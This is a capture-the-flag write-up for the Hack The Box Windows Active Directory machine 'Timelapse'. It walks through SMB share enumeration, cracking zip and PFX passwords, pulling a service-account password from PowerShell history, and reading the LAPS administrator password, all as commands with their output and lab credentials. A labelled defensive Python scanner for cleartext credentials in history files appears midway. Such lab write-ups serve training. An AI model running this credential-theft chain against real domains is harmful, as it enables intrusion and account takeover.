HTB Timelapse done
Timelapse
OS: Windows AD
Technology: SMB
IP Address: 10.10.11.152
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-15 10:07:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
Users and passwords:
Password for file: legacyy_dev_auth.pfx
P: thuglegacy
---
From PowerShell command-line history:
L: svc_deploy
P: E3R$Q62^12p7PLlC%KWaxuaV
---
Read from ms-mcs-admpwd:
L: Administrator
P: .+6wL0M91gP5x%(8-4]j,g3i
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.10.11.152_nmap 10.10.11.152 ; cat 10.10.11.152_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-15 02:04 UTC
Nmap scan report for 10.10.11.152
Host is up (0.039s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-15 10:07:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_ssl-date: 2024-08-15T10:09:02+00:00; +8h00m08s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
Add IP to /etc/hosts
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ cat /etc/hosts | grep time
10.10.11.152 dc01.timelapse.htb
Get zip file from SMB
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ smbclient -L //10.10.11.152 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ smbclient -N //10.10.11.152/Shares
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Oct 25 15:39:15 2021
.. D 0 Mon Oct 25 15:39:15 2021
Dev D 0 Mon Oct 25 19:40:06 2021
HelpDesk D 0 Mon Oct 25 15:48:42 2021
6367231 blocks of size 4096. 1337935 blocks available
smb: \> cd Dev\
smb: \Dev\> dir
. D 0 Mon Oct 25 19:40:06 2021
.. D 0 Mon Oct 25 19:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 15:46:42 2021
6367231 blocks of size 4096. 1337935 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (11.5 KiloBytes/sec) (average 11.5 KiloBytes/sec)
smb: \Dev\> cd ..
smb: \> dir
. D 0 Mon Oct 25 15:39:15 2021
.. D 0 Mon Oct 25 15:39:15 2021
Dev D 0 Mon Oct 25 19:40:06 2021
HelpDesk D 0 Mon Oct 25 15:48:42 2021
6367231 blocks of size 4096. 1337871 blocks available
smb: \> cd HelpDesk\
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 15:48:42 2021
.. D 0 Mon Oct 25 15:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 14:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 14:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 14:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 14:57:44 2021
6367231 blocks of size 4096. 1332808 blocks available
smb: \HelpDesk\> get LAPS.x64.msi
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (947.1 KiloBytes/sec) (average 796.6 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_Datasheet.docx
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (478.8 KiloBytes/sec) (average 754.0 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_OperationsGuide.docx
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (2074.0 KiloBytes/sec) (average 965.0 KiloBytes/sec)
smb: \HelpDesk\> get LAPS_TechnicalSpecification.docx
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (184.4 KiloBytes/sec) (average 832.8 KiloBytes/sec)
smb: \HelpDesk\> exit
Cracking password for file: winrm_backup.zip
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ zip2john winrm_backup.zip > winrm_backup.hash
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ john winrm_backup.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2024-08-15 02:46) 2.857g/s 9912Kp/s 9912Kc/s 9912KC/s surken201..suppamart
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Unzip file: winrm_backup.zip
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
inflating: legacyy_dev_auth.pfx
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ ls
10.10.11.152_nmap.gnmap 10.10.11.152_nmap.nmap 10.10.11.152_nmap.xml LAPS_Datasheet.docx LAPS_OperationsGuide.docx LAPS_TechnicalSpecification.docx LAPS.x64.msi legacyy_dev_auth.pfx winrm_backup.hash winrm_backup.zip
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ file legacyy_dev_auth.pfx
legacyy_dev_auth.pfx: data
Convert PFX to PEM
Cracking password for file: legacyy_dev_auth.pfx
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ pfx2john legacyy_dev_auth.pfx > legacyy_dev_auth.hash
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ john legacyy_dev_auth.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 SSE2 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:33 DONE (2024-08-17 00:09) 0.01069g/s 34566p/s 34566c/s 34566C/s thuglife03282006..thug209
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Convert pfx to key.pem and cert.pem
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth_key.pem -nodes
Enter Import Password:
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out legacyy_dev_auth_cert.pem
Enter Import Password:
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ ls -l *.pem
-rw------- 1 kali kali 1232 Aug 18 00:39 legacyy_dev_auth_cert.pem
-rw------- 1 kali kali 1952 Aug 18 00:38 legacyy_dev_auth_key.pem
Privilege Escalation
Login as user: legacyy
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ evil-winrm -i 10.10.11.152 -c legacyy_dev_auth_cert.pem -k legacyy_dev_auth_key.pem -S
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
Read flag: user.txt
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> dir
Directory: C:\Users\legacyy\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/18/2024 1:08 AM 34 user.txt
*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
6faa06e4264ef794a9fe2343a99d57db
*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
================= ============================================
timelapse\legacyy S-1-5-21-671920749-559770252-3318990721-1603
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Development Group S-1-5-21-671920749-559770252-3318990721-3101 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::172
IPv6 Address. . . . . . . . . . . : dead:beef::e144:82a7:62e3:cc35
Link-local IPv6 Address . . . . . : fe80::e144:82a7:62e3:cc35%13
IPv4 Address. . . . . . . . . . . : 10.10.11.152
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:5e7c%13
10.10.10.2
*Evil-WinRM* PS C:\Users\legacyy\Desktop>
Read command-line history (PowerShell)
I found the login and password for the service account svc_deploy:
svc_deploy
E3R$Q62^12p7PLlC%KWaxuaV
---
*Evil-WinRM* PS C:\Users\legacyy\Documents> type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
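The history above shows a cleartext password converted with ConvertTo-SecureString -AsPlainText and then wrapped in a PSCredential. As an added defender-side example (not code from the original writeup), here is a Python scanner that flags that pattern, and net user lines that carry a password, in a PSReadLine history file; the sample history and its secret values are constructed placeholders, and the default path is the one typed above.

```python
import os
import re
import sys
from typing import Dict, List

# Default location of the PSReadLine history on Windows (the file read on this box).
DEFAULT_HISTORY = os.path.join(
    os.environ.get("APPDATA", ""), "Microsoft", "Windows", "PowerShell",
    "PSReadLine", "ConsoleHost_history.txt")

# Constructed sample modelled on the history found in the writeup; the secrets
# here are placeholders, not values from the box.
SAMPLE_HISTORY = """whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Pl4ceholder!Secret' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
net user backup_admin Summ3r2021! /add
net user svc_deploy /domain
get-aduser -filter * -properties *
exit
"""

# $var = ConvertTo-SecureString '<literal>' -AsPlainText ...  (only -AsPlainText means a
# cleartext secret was typed; without it the input is an already-encrypted standard string)
SECURESTRING = re.compile(
    r"^\s*\$(?P<var>\w+)\s*=\s*ConvertTo-SecureString\s+(?P<q>['\"])(?P<secret>.+?)(?P=q)"
    r".*-AsPlainText", re.I)
# New-Object ... PSCredential ('<user>', $var)
PSCREDENTIAL = re.compile(
    r"PSCredential\s*\(\s*(?P<q>['\"])(?P<user>[^'\"]+)(?P=q)\s*,\s*\$(?P<var>\w+)", re.I)
# net user <name> <password> [/add]  (a leading '/' or '*' is a switch or a prompt, not a password)
NET_USER = re.compile(r"\bnet\s+user\s+(?P<user>\S+)\s+(?P<secret>[^/*\s]\S*)", re.I)


def redact(secret: str) -> str:
    """Report only the length so the findings themselves do not leak the secret."""
    return f"<redacted {len(secret)} chars>"


def scan_history(text: str) -> List[Dict[str, object]]:
    """Return one finding per line that exposes a credential, resolving $var references."""
    findings: List[Dict[str, object]] = []
    secure_vars: Dict[str, str] = {}  # $var name -> plaintext it was built from
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = SECURESTRING.search(line)
        if m:
            secure_vars[m["var"]] = m["secret"]
            findings.append({"line": lineno, "rule": "plaintext-securestring",
                             "user": "", "secret": redact(m["secret"])})
            continue
        m = PSCREDENTIAL.search(line)
        if m:
            secret = secure_vars.get(m["var"])
            findings.append({"line": lineno, "rule": "pscredential", "user": m["user"],
                             "secret": redact(secret) if secret else "<unresolved $%s>" % m["var"]})
            continue
        m = NET_USER.search(line)
        if m:
            findings.append({"line": lineno, "rule": "net-user-password",
                             "user": m["user"], "secret": redact(m["secret"])})
    return findings


def scan_file(path: str = DEFAULT_HISTORY) -> List[Dict[str, object]]:
    """Scan a history file on disk (defaults to the current user's PSReadLine history)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_history(fh.read())


if __name__ == "__main__":
    results = scan_file(sys.argv[1]) if len(sys.argv) > 1 else scan_history(SAMPLE_HISTORY)
    for f in results:
        print(f"line {f['line']:>4}  {f['rule']:<22} user={f['user'] or '-':<14} {f['secret']}")
```

Run it against every user's ConsoleHost_history.txt on a host to find the same exposure before an attacker does; the report deliberately prints only secret lengths.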
Login as user: svc_deploy
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
timelapse\svc_deploy S-1-5-21-671920749-559770252-3318990721-3103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\LAPS_Readers Group S-1-5-21-671920749-559770252-3318990721-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Find group: LAPS_Readers
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 12:25:53 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Find password for user: Administrator (read the LAPS attribute ms-mcs-admpwd on DC01 as a LAPS_Readers member)
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-ADComputer dc01 -property 'ms-mcs-admpwd'
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-mcs-admpwd : .+6wL0M91gP5x%(8-4]j,g3i
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
Login as user: Administrator
L: Administrator
P: .+6wL0M91gP5x%(8-4]j,g3i
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Timelapse]
└─$ evil-winrm -i 10.10.11.152 -u administrator -p '.+6wL0M91gP5x%(8-4]j,g3i' -S
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Read flag: root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cd ../../
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> cd TRX\Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> dir
Directory: C:\Users\TRX\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/18/2024 2:38 AM 34 root.txt
*Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt
fb399a0d9c0b8abf9fba078660b7ee25
*Evil-WinRM* PS C:\Users\TRX\Desktop>
*Evil-WinRM* PS C:\Users\TRX\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
======================= ===========================================
timelapse\administrator S-1-5-21-671920749-559770252-3318990721-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
================================================ ================ =========================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Group Policy Creator Owners Group S-1-5-21-671920749-559770252-3318990721-520 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Domain Admins Group S-1-5-21-671920749-559770252-3318990721-512 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Enterprise Admins Group S-1-5-21-671920749-559770252-3318990721-519 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Schema Admins Group S-1-5-21-671920749-559770252-3318990721-518 Mandatory group, Enabled by default, Enabled group
TIMELAPSE\Denied RODC Password Replication Group Alias S-1-5-21-671920749-559770252-3318990721-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\TRX\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::1c4
IPv6 Address. . . . . . . . . . . : dead:beef::a45a:9993:13aa:4d2
Link-local IPv6 Address . . . . . : fe80::a45a:9993:13aa:4d2%13
IPv4 Address. . . . . . . . . . . : 10.10.11.152
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:5e7c%13
10.10.10.2
*Evil-WinRM* PS C:\Users\TRX\Desktop>
References
https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/laps
Lessons Learned